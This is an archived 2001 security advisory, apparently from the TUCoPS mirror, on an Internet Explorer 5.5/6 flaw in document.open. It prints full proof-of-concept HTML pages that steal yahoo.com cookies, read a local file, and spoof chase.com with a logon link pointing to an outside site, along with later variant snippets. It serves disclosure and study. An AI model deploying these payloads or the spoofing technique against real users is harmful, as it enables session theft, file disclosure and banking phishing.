20th Dec 2001 [SBWID-4944]
COMMAND
IE document.open method allows access to local files and cookies
SYSTEMS AFFECTED
Tested on :
IE 6.0.2600.0000 + Windows 2000 Update Versions:Q312461,Q240308,Q313675
IE 5.5 SP2
IE 5.50.4807.2300
PROBLEM
the Pull published [http://www.osioniusx.com] :
By simply using the document.open method and not using the
document.close method you are able to: steal cookies; read local files
that are parsable by IE(mime type text/html to be exact); and spoof
sites.
Exploits on : http://www.osioniusx.com
\"cookieStealing.html\" - This opens Yahoo.com and steals the cookie.
<html>
<head>
<title>Cookie Stealing</title>
</head>
<body>
<P>This page shows how this bug can be used to steal cookies. For this example
I use yahoo.com and a five second timeout (wait five seconds after the window
opens). Cookie stealing can result in impersonation, stealing of Credit Card
numbers, etc.
<script>
var y = document.open( \"http://www.yahoo.com\", \"x\", \"width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes\" );
setTimeout(\'alert(y.document.cookie);y.close();\',5000);
</script>
</P>
</html>
\"FileReading.html\" - This opens up C:\\test.txt and then reads it.
<html>
<head>
<title>File Reading</title>
</head>
<body>
This page shows local file reading with this bug. The file being read is c:\\test.txt.
This could be used to gather various types of passwords, and other local information you do not
want malicious, remote users to have.
<script>
var y = document.open( \"c:/test.txt\", \"x\", \"width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes\" );
setTimeout(\'alert(y.document.body.innerHTML);y.close();\',1000);
</script>
</html>
\"SiteSpoofing.html\" - This spoofs www.chase.com -- chase.com is in
the url, the title, and there is a link on the page to log on to your
account which comes back to www.osioniusx.com.
<html>
<head>
<title>Web Site Spoofing</title>
</head>
<body>
<script>
s=\'<title>Chase</title>Chase Bank content could go here <br><br><a href=http://www.osioniusx.com/>LogOn To Your Bank Account</a>\';
var y = document.open( \"http://www.chase.com\", \"x\", \"status = yes, location = yes,resizable = yes, toolbar=yes, directories=yes,menubar=yes\" );
setTimeout(\'y.document.write(s);\',500);
</script>
</html>
Update by Rogan Dawes :
if you use an \"https://\" URL, it also shows THAT in the location bar.
Naturally, there are no SSL indicators (padlock, Secure properties,
etc).
For the paranoid among us (i.e. you have the alerts turned on), IE DOES
warn that you are entering and then LEAVING a secure session, but the
fact remains that the Location field shows \"https://\"
It doesn\'t seem to work for documents containing frames, however.
And you can get the logo to stop spinning by doing the document.close
inside the timeout call. (If you look at the source of the spoofed page
demo, you\'ll see what I mean.)
Update
======
Jelmer posted recently a similar exploit and \"the Pull\" added :
Jelmer\'s:
\" extDoc =
document.open(\'file:///C:/jelmer.txt\',\'jelmer\',\'height=200,width=400,status=no,toolbar=no,menubar=no,location=no\');\"
mine:
var y = document.open( \"c:/test.txt\", \"x\",
\"width=400,height=400,status = yes, location =
yes,resizable = yes, toolbar=yes\" );
It doesn\'t matter if it is \"cmd =
\'extDoc.execScript(\"alert(document.body.innerText)\",
\"Jscript\");\';\" that is able to read the code or this:
setTimeout(\'alert(y.document.body.innerHTML);y.document.close();\',1000);
-- they are just the same thing.
(ref: http://www.osioniusx.com document.write()) bug.
Basically, the problem is that when the document.write() uses the
window.open() method as described on the msdn website for the method
here:
http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/open_1.asp
SOLUTION
None yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
